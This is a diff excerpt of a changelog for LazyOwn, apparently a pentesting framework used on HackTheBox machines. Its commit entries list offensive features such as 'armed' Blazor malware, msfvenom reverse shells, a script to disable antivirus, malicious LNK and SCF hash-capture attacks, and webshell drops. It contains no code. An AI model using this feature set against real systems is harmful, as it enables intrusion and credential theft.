Correcciones
-Otros
+Otros
- fix(fix): blazormalware corrected now functional and armed :)
@@ -7285,7 +7299,7 @@ Hora: 1724441283
Documentación
-Otros
+Otros
- docs(Lang): Translate README.md to English, enhancing clarity and
@@ -7305,7 +7319,7 @@ Hora: 1724221541
Nuevas características
-Otros
+Otros
- feat(malware new): blazor malware Version: release/0.1.20 create
@@ -7318,7 +7332,7 @@ Hora: 1724138267
Refactorización
-Otros
+Otros
- refactor(refactor): se agrega la libreria colors en modules para
@@ -7333,8 +7347,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Tue Aug 20 02:20:17 2024 -0400
Hora: 1724134817
-Otros
Otros
+Otros
- feature(feat): dos comandos nuevos, skipfish y createdll, nuevo
@@ -7348,7 +7362,7 @@ Hora: 1724048452
Nuevas características
-Otros
+Otros
- feat(feat): create new command shellcode, run lazymsfvenom modified
@@ -7362,7 +7376,7 @@ Hora: 1724042153
Nuevas características
-Otros
+Otros
- feat(new feat): new funcionality in proxy command, hexdump on
@@ -7376,7 +7390,7 @@ Hora: 1724029946
Nuevas características
-Otros
+Otros
- feat(feat): new prompt Version: release/0.1.16 now show the url of
@@ -7388,7 +7402,7 @@ Hora: 1724021178
Nuevas características
-Otros
+Otros
- feat(feat): new command set_proxychains Version: release/0.1.15
@@ -7401,7 +7415,7 @@ Hora: 1724013691
Correcciones
-Otros
+Otros
- fix(bug fixing): bug fixing in vars of DEPLOY.sh Version:
@@ -7412,8 +7426,8 @@ LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sun Aug 18 16:37:23
2024 -0400 Hora: 1724013443
-Otros
Otros
+Otros
- feature(new payload in msfvenom android): new options in msf rev
@@ -7426,7 +7440,7 @@ Hora: 1723891492
Documentación
-Otros
+Otros
- docs(documented): agradecimientos Version: release/0.1.12 a ✌ el
@@ -7438,7 +7452,7 @@ Hora: 1723891152
Nuevas características
-Otros
+Otros
- feat(implement sicat libs): to ss command Version: release/0.1.12
@@ -7453,7 +7467,7 @@ Hora: 1723876813
Nuevas características
-Otros
+Otros
- feat(some fixes): html and new patreon :) Version: release/0.1.11 :)
@@ -7464,8 +7478,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Fri Aug 16 21:52:15 2024 -0400
Hora: 1723859535
-Otros
Otros
+Otros
- feature(new tools): new commands, new payloads in find, new cves,
@@ -7480,7 +7494,7 @@ Hora: 1723841764
Nuevas características
-Otros
+Otros
- feat(new feature): new command finalrecon docuemnted at COMMANDS.md
@@ -7494,7 +7508,7 @@ Hora: 1723791472
Nuevas características
-Otros
+Otros
- feat(command): new commando swaks to abuse of smtp Version:
@@ -7507,7 +7521,7 @@ Hora: 1723790116
Correcciones
-Otros
+Otros
- fix(fix in vpn): new machine Version: release/0.1.7 chenges in
@@ -7518,8 +7532,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 23:58:16 2024 -0400
Hora: 1723780696
-Pruebas
-Otros
+Pruebas
+Otros
- test(deleted files): index.sh y dump_readme.sh Version:
@@ -7532,7 +7546,7 @@ LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 23:55:59
Refactorización
-Otros
+Otros
- refactor(refactor DEPLOY, sessionstrace): se crea todo en un solo
@@ -7547,8 +7561,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 20:15:03 2024 -0400
Hora: 1723767303
-Otros
Otros
+Otros
- feature(sessionssh y sessionsshstrace): nuevos comandos documentados
@@ -7561,8 +7575,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 19:06:13 2024 -0400
Hora: 1723763173
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing Changelog): new method to create changelog Version:
@@ -7574,7 +7588,7 @@ Hora: 1723761786
Nuevas características
-Otros
+Otros
- feat(lazyscripts): se crea el comando y el directorio lazyscripts el
@@ -7587,8 +7601,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 18:16:02 2024 -0400
Hora: 1723760162
-Otros
Otros
+Otros
- feature(nuevos recursos, comandos, archivos tool para pwntomate): se
@@ -7606,7 +7620,7 @@ Hora: 1723713869
Nuevas características
-Otros
+Otros
- feat(tool): nuevo tool a pwntomate medusa.tool Version:
@@ -7618,7 +7632,7 @@ Hora: 1723713306
Nuevas características
-Otros
+Otros
- feat(medusa): nueco comando Version: release/0.1.2 para crackear
@@ -7630,7 +7644,7 @@ Hora: 1723710713
Documentación
-Otros
+Otros
- docs(changelog): reload Version: release/0.1.1 deleted -
@@ -7642,7 +7656,7 @@ Hora: 1723710641
Documentación
-Otros
+Otros
- docs(history): reload the history deleted by error holly git :P
@@ -7654,7 +7668,7 @@ Hora: 1723708444
Correcciones
-Otros
+Otros
- fix(fix): fix Version: release/0.1.1 fix - DEPLOY.sh - README.md -
@@ -7665,7 +7679,7 @@ Hora: 1723708240
Correcciones
-Otros
+Otros
- fix(fix): versionamiento Version: - DEPLOY.sh - README.md -
@@ -7676,7 +7690,7 @@ Hora: 1723707886
Correcciones
-Otros
+Otros
- fix(fix): fix en los tags Version: - README.md - docs/README.html -
@@ -7687,7 +7701,7 @@ Hora: 1723707626
Correcciones
-Otros
+Otros
- fix(version file): Version: - README.md - docs/README.html -
@@ -7698,7 +7712,7 @@ Hora: 1723707479
Correcciones
-Otros
+Otros
- fix(pandoc): command Version: bad arguments - DEPLOY.sh - README.md
@@ -7709,7 +7723,7 @@ Hora: 1723707415
Correcciones
-Otros
+Otros
- fix(fix): changelog Version: :D - DEPLOY.sh - README.md -
@@ -7720,7 +7734,7 @@ Hora: 1723707071
Correcciones
-Otros
+Otros
- fix(fixing): fixin bug in formating of changelog Version: :D -
@@ -7731,7 +7745,7 @@ Hora: 1723706793
Correcciones
-Otros
+Otros
- fix(fixing): fixing semantic version Version: implemented -
@@ -7743,7 +7757,7 @@ Hora: 1723706420
Nuevo Release
-Otros
+Otros
- release(release): tipo release Version: probandoe l tipo release -
@@ -7754,7 +7768,7 @@ LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 03:19:32
Correcciones urgentes
-Otros
+Otros
- hotfix(error en parametro): deploy en el pandocpara generar
@@ -7766,7 +7780,7 @@ Hora: 1723706284
Nuevas características
-Otros
+Otros
- feat(cambio en el versionamiento semantico): se agregan release y
@@ -7779,7 +7793,7 @@ Hora: 1723705040
Nuevo parche
-Otros
+Otros
- patch(patching): prueba de nuevos tipos de commits Version: en este
@@ -7789,8 +7803,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 02:34:57 2024 -0400
Hora: 1723703697
-Pruebas
-Otros
+Pruebas
+Otros
- test(testind): deploy Version: release/0.1.0 test LazyOwn on
@@ -7800,7 +7814,7 @@ Hora: 1723703502
Nuevas características
-Otros
+Otros
- feat(semantic versioning): se implementa el versionamiento semantico
@@ -7813,7 +7827,7 @@ LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 02:01:01
Correcciones
-Otros
+Otros
- fix(firma de commits con pgp): cree una firmita gpg para firmar los
@@ -7823,8 +7837,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 01:52:52 2024 -0400
Hora: 1723701172
-Otros
Otros
+Otros
- feature(test): testing deploy feature and semantic versioning
@@ -7834,8 +7848,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 01:50:07 2024 -0400
Hora: 1723701007
-Pruebas
-Otros
+Pruebas
+Otros
- test(deploy): testing deploy script Version: release/0.0.13 testing
@@ -7846,7 +7860,7 @@ Hora: 1723700844
Correcciones urgentes
-Otros
+Otros
- hotfix(bug in Deploy): not updated the index.html file in deploys
@@ -7857,8 +7871,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 01:31:04 2024 -0400
Hora: 1723699864
-Otros
Otros
+Otros
- feature(mejoras y fixes): - se agrega un pequeño diccionario en el
@@ -7872,7 +7886,7 @@ Hora: 1723695184
Nuevas características
-Otros
+Otros
- feat(add scripts): - adding scripts on sessions/win directory a nc
@@ -7884,7 +7898,7 @@ Hora: 1723692675
Documentación
-Otros
+Otros
- docs(add README.html to anchor tag in menu of index.html): - chenges
@@ -7896,7 +7910,7 @@ Hora: 1723692351
Documentación
-Otros
+Otros
- docs(mejora documentaciòn): se completan varios comandos con
@@ -7907,8 +7921,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 23:00:31 2024 -0400
Hora: 1723690831
-Otros
Otros
+Otros
- feature(cambios en script fast_run_as_r00t.sh): se agrega la opción
@@ -7921,7 +7935,7 @@ Hora: 1723674013
Documentación
-Otros
+Otros
- docs(test): bad tabs in index.html Version: release/0.0.13 LazyOwn
@@ -7931,7 +7945,7 @@ Hora: 1723673205
Documentación
-Otros
+Otros
- docs(cambio en index.html): tabulacion incorrecta del banner
@@ -7942,7 +7956,7 @@ Hora: 1723672865
Refactorización
-Otros
+Otros
- refactor(refactor): se cambia el nombre de readme.sh a
@@ -7953,8 +7967,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 17:45:42 2024 -0400
Hora: 1723671942
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): test Version: release/0.0.13 test LazyOwn on HackTheBox:
@@ -7963,8 +7977,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 17:38:56 2024 -0400
Hora: 1723671536
-Otros
Otros
+Otros
- feature(actualizador de readme.md): con los nuevos cambios desde los
@@ -7975,8 +7989,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 17:27:23 2024 -0400
Hora: 1723670843
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): new styles in html of documentation Version:
@@ -7986,8 +8000,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 17:06:21 2024 -0400
Hora: 1723669581
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): testing changelog Version: release/0.0.13 LazyOwn on
@@ -7996,8 +8010,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 17:03:41 2024 -0400
Hora: 1723669421
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing): new changelog format Version: release/0.0.13 new
@@ -8007,8 +8021,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 16:56:07 2024 -0400
Hora: 1723668967
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): Version: release/0.0.13 test LazyOwn on HackTheBox:
@@ -8017,8 +8031,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 16:55:32 2024 -0400
Hora: 1723668932
-Pruebas
-Otros
+Pruebas
+Otros
- test(testeando): nuevo changelog Version: release/0.0.13 mejor
@@ -8028,8 +8042,8 @@ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 16:47:49 2024 -0400
Hora: 1723668469
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): deploy Version: release/0.0.13 changes in changelog
@@ -8038,8 +8052,8 @@ LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 16:35:12
2024 -0400 Hora: 1723667712
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing): changelog Version: release/0.0.13 saltos de linea
@@ -8048,8 +8062,8 @@ LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 16:34:08
2024 -0400 Hora: 1723667648
-Pruebas
-Otros
+Pruebas
+Otros
- test(tesing): saltos de linea en commit Version: release/0.0.13 :)
@@ -8059,7 +8073,7 @@ LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 16:28:47
Documentación
-Otros
+Otros
- docs(class=“neon-text” on ul): :): release/0.0.13:)LazyOwn on
@@ -8068,8 +8082,8 @@ https://grisuno.github.io/LazyOwn/ : Wed Aug 14 15:57:39 2024 -0400 -
Hora: 1723665459
-Pruebas
-Otros
+Pruebas
+Otros
- test(commits con fecha y hora :P): probando el despliegue:
@@ -8079,8 +8093,8 @@ https://grisuno.github.io/LazyOwn/ : Wed Aug 14 15:52:12 2024 -0400 -
Hora: 1723665132
-Pruebas
-Otros
+Pruebas
+Otros
- test(test de index.html): testeando el despliegue automatizado del
@@ -8089,8 +8103,8 @@ on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(test index.sh): se realizan cambios en index.sh:
@@ -8100,8 +8114,8 @@ https://app.hackthebox.com/teams/overview/6429 LazyOwn/
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing): Testeando el flujo de trabajo en los despliegues
@@ -8110,8 +8124,8 @@ HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- feature(versionamiento semantico en script de deploy): mejora en
@@ -8121,8 +8135,8 @@ https://app.hackthebox.com/teams/overview/6429 LazyOwn/
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(test of –no-test): and lolcat on clock command :Phas now
@@ -8133,7 +8147,7 @@ https://grisuno.github.io/LazyOwn/
Documentación
-Otros
+Otros
- docs(se agrega el change log al readme): tambien se ejecutan pruebas
@@ -8145,7 +8159,7 @@ https://grisuno.github.io/LazyOwn/
Correcciones urgentes
-Otros
+Otros
- hotfix(fix in vpn): dont work with argumentsworks xD👽 LazyOwn on
@@ -8154,8 +8168,8 @@ https://www.reddit.com/r/LazyOwn/ 👽
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- feature(parametrizar el despliegue): se agrega el parametro –no-test
@@ -8165,8 +8179,8 @@ https://www.reddit.com/r/LazyOwn/ 👽
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(troubleshooting): deleting the tmp file but i cant sleep👽
@@ -8176,7 +8190,7 @@ https://grisuno.github.io/LazyOwn/
Correcciones urgentes
-Otros
+Otros
- hotfix(delete qa command to option -c): bug: dont let beggin
@@ -8186,8 +8200,8 @@ https://www.reddit.com/r/LazyOwn/ 👽
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(despliegue): backup file del archivo lazyown creado en las
@@ -8199,8 +8213,8 @@ https://www.reddit.com/r/LazyOwn/ 👽
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(despliegue): de organizaciòn de archivos ovpn dentro del
@@ -8210,8 +8224,8 @@ https://www.reddit.com/r/LazyOwn/ 👽
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(testmeneitor): probando el workflow de desplieguees el body de
@@ -8221,8 +8235,8 @@ https://www.reddit.com/r/LazyOwn/ 👽
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- feature(nuevo creador de index.html): crea el html de manera
@@ -8233,8 +8247,8 @@ https://www.reddit.com/r/LazyOwn/ 👽
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- feature(mejora CHANGELOG.sh): ahora actualiza usando
@@ -8246,7 +8260,7 @@ https://grisuno.github.io/LazyOwn/
Nuevas características
-Otros
+Otros
- feat(mejorando el tipo): cambio en el script CHANGELOG.shmejora la
@@ -8257,7 +8271,7 @@ https://grisuno.github.io/LazyOwn/
Documentación
-Otros
+Otros
- docs(docs): El cierre de una imagen en la documentación estaba mal
@@ -8267,22 +8281,22 @@ https://www.reddit.com/r/LazyOwn/ 👽
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- Nueva descripcion en el readme y probando el CHANGELOG.sh :)
-Otros
Otros
+Otros
- ahora el changelog a docs :D en formato html
-Otros
Otros
+Otros
- HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 Ahora
@@ -8293,8 +8307,8 @@ todas las funciones nuevas como copy2clip :P, y estrenamos CHANGELOG.md
y CHANGELOG.sh :D 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
@@ -8302,8 +8316,8 @@ some changes in the web pandoc README.md -f markdown -t html -s -o
README.html madremia que comandazo 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
@@ -8311,24 +8325,24 @@ some changes in the web pandoc README.md -f markdown -t html -s -o
README.html madremia que comandazo 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
some changes in the web 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
comming soon tryhackme 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
@@ -8337,40 +8351,40 @@ base64encode, base64decode, rdp, all documented by my documentator
readmeneitor.py :P 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 new
fancy proompt :) 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 bug
fixing 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429
👽👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
3ast3r366 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
@@ -8378,8 +8392,8 @@ commands documented at COMMANDS.md and new ultis documented at ULTIS.md
👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
@@ -8387,8 +8401,8 @@ commands documented at COMMANDS.md and new ultis documented at ULTIS.md
👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
@@ -8396,31 +8410,31 @@ commands documented at COMMANDS.md and new ultis documented at ULTIS.md
👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
command launchpad to recon Linux OS 👽
-Otros
Otros
+Otros
- Merge pull request #27 from grisuno/clcthulhu-patch-1
Documentación
-Otros
+Otros
- docs(update readme description): change of the description; Update
README.md
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
@@ -8428,40 +8442,40 @@ Machine, New Session, New Look, New functions, New tools, New CVEs, NEW
VERSION 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
mejorando la documentaciòn 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 new
commands rulencode, urldecode, y lynis documented at COMMANDS.md 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
command vpn now handle multiple ovpn files 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
command vpn now handle multiple ovpn files 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 new
@@ -8469,24 +8483,24 @@ commands documented at COMMANDS.md, now implement autocomplete at
hashcat, more soon :) 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 new
commands documented at COMMANDS.md
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429
Magicgardens is so insane but pwned :)
-Otros
Otros
+Otros
- 👽 new commands documented in COMMANDS.md or README.md and more
@@ -8494,8 +8508,8 @@ documentation of the proyect thanks to readmineitor.py :D comming soon
their own repo…
-Otros
Otros
+Otros
- 👽 new commands documented in COMMANDS.md or README.md and more
@@ -8503,302 +8517,302 @@ documentation of the proyect thanks to readmineitor.py :D comming soon
their own repo…
-Otros
Otros
+Otros
- 👽 new machine magic gardens insane machine because resource was
pwned and sea not was released yet
-Otros
Otros
+Otros
- 👽 bug fixing in createhash, new wrappers, chisel command updated
now can choice the payload, img2cookie new payloads
-Otros
Otros
+Otros
- 👽 bug fixing in createhash, new wrappers, chisel command updated
now can choice the payload, img2cookie new payloads
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- 👽 new tools for pwntomate :D
-Otros
Otros
+Otros
- 👽 new command img2cookie :)
-Otros
Otros
+Otros
- 👽 new command img2cookie :)
-Otros
Otros
+Otros
- 👽 new machine comprezzor.htb
-Otros
Otros
+Otros
- 👽 new script readmeneitor req updated
-Otros
Otros
+Otros
- 👽 new script readmeneitor to help me update the readme xD
-Otros
Otros
+Otros
- 👽 new command ssh 22 and if u have file sessions/credentials.txt
this will open ssh conection :)
-Otros
Otros
+Otros
- 👽 bug fixing and replace command nc with pwncatcs more fancy and
sharp :)
-Otros
Otros
+Otros
- 👽 bug fixing in wfuzz sub command wen you not pass the domain
-Otros
Otros
+Otros
- 👽 some changes in nmap script now discovery have template html too
and we have a little index2.html to navigate the reports.
-Otros
Otros
+Otros
- 👽 some littles changes :)
-Otros
Otros
+Otros
- 👽 new machine compiled :)
-Otros
Otros
+Otros
- 👽 new command disableav to create a aav.vbs to disable av if it’s
possible :)
-Otros
Otros
+Otros
- 👽 changing the command in venom :)
-Otros
Otros
+Otros
- 👽 holly jissus mist.htb now pwned with my user :P its rally insane
amount of work to pwn
-Otros
Otros
+Otros
- 👽 holly jissus mist.htb machine cost to me one week and my mental
health xD bu it’s pwned xD
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- 👽 chisel fix copy to clipboard commad bug …
-Otros
Otros
+Otros
- 👽 command list to update the readme: todo …
-Otros
Otros
+Otros
- 👽 no more prints ( 👽 we have 13 xD) now we have technologì we have
print_msg, print_error & print_warn :) so much pretty
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- 👽 new brothers commands, LazyOwn> winbase64payload and
asprevbase64 👽
-Otros
Otros
+Otros
- some roder to prints, not finished yet but the storm its cut the
electricity so commit….
-Otros
Otros
+Otros
- feat: somo testing and alias now you can run gpt alias :D
-Otros
Otros
+Otros
- feat: Now the GPT Client use Llama 70B and now can hack :) fixing
error path from json files :P
-Otros
Otros
+Otros
- feat: Now the GPT Client use Llama 70B and now can hack :)
-Otros
Otros
+Otros
- feat: more time to the nmap to finished and pyautomate
autostart
-Otros
Otros
+Otros
- feat: New stylesheet for Nmap reports, making them more professional
@@ -8807,45 +8821,45 @@ and supper fast automate auto run script as fast_run_as_r00t.sh, demo
soon
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- some new attacks exploits and new menu to download resources and
exploits :D new msf autoroute :D
-Otros
Otros
+Otros
- some new attacks exploits and new menu to download resources adn
exploits :D
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 command
@@ -8853,48 +8867,48 @@ smbserver now create file.scf to generate a attackto the victim try to
charge an iccon from our smbserver and the hash is ours
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command getnpusers
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 the target
was pwntomated 🍅 alias auto.
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 the target
was pwntomated 🍅 alias auto.
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 the target
was pwntomated 🍅. jejejjejej
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 now with
pwntomate to automate with the command pyautomate
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 now
@@ -8902,8 +8916,8 @@ command nmap or run lazynmap has a html and xml reports to more
pleasssure. xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -8911,8 +8925,8 @@ command chisel to run chisel as server before run download_resource
command
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 socat
@@ -8921,101 +8935,101 @@ command to use proxychains :D and better msf rev now with argument
perform a malicious shortcut lnk attack with msfvenom
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 some
format….
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 …
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 fix
arguments little bug
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 fix
arguments little bug
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
arguments :) -c command ex ping
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
aliases :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 now
options like –help, -v and –no-banner :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command clock to see the time of the eternal now :) now in white xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command clock to see the time of the eternal now :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429
newhashcat
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -9023,8 +9037,8 @@ comands conptyshell better command nc noew with tty treatment createhash
better now with recognice automate download_resource
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 another
@@ -9033,40 +9047,40 @@ not unban so i can unlck my writeups and spoiler spoiler spoiler alert
xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 was banned
from htb to spoiler jajjajaj xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 msf
command
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 scripts to
try attac cammeras not work with my cammera yet xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 scripts to
try attac cammeras not work with my cammera yet xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -9074,24 +9088,24 @@ commands ignorearp ignoreicmp acknowledgearp acknowledgeicmp ports
cports
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 clean
command to clean up the mess and pwn the next machine :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 wfuzz
commands pwd, sh
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 wfuzz
@@ -9099,72 +9113,72 @@ command now search subdomains with wfuzz sub domain.htb new commands nc,
vpn, rev, banner :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New Colors
:D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 adding run
script to run lazyown with virtual env activated to avoid errors
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 adding
alias to exit as q :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 adding
alias to commands its una shulada
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 some love
to list command :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 some love
in form of colored strings :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 some love
to some prints :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command py3ttyup to upgrade to tty your rev shell :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -9173,8 +9187,8 @@ where lazyown dump scripts like revertshells, webshells, etc. and some
fixperms :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -9182,120 +9196,120 @@ commands ip www to show ips and start webserver at sessions directory
where lazyown dump scripts like revertshells, webshells, etc.
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 solarlab
pwned :D new machine MagicGardens
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine solarlab :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
revshell.c and machine powned xD axlle hard
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
commands createrevshell y createwinrevshell
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 FormulaX
pwned :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Freelancer Pwned :P new new new FormulaX :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Freelancer :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Skyfall Linux insane machine, Blazorized was powned :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Blazorized.htb
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Greenhorn.htb pwned
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Greenhorn.htb
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new tool
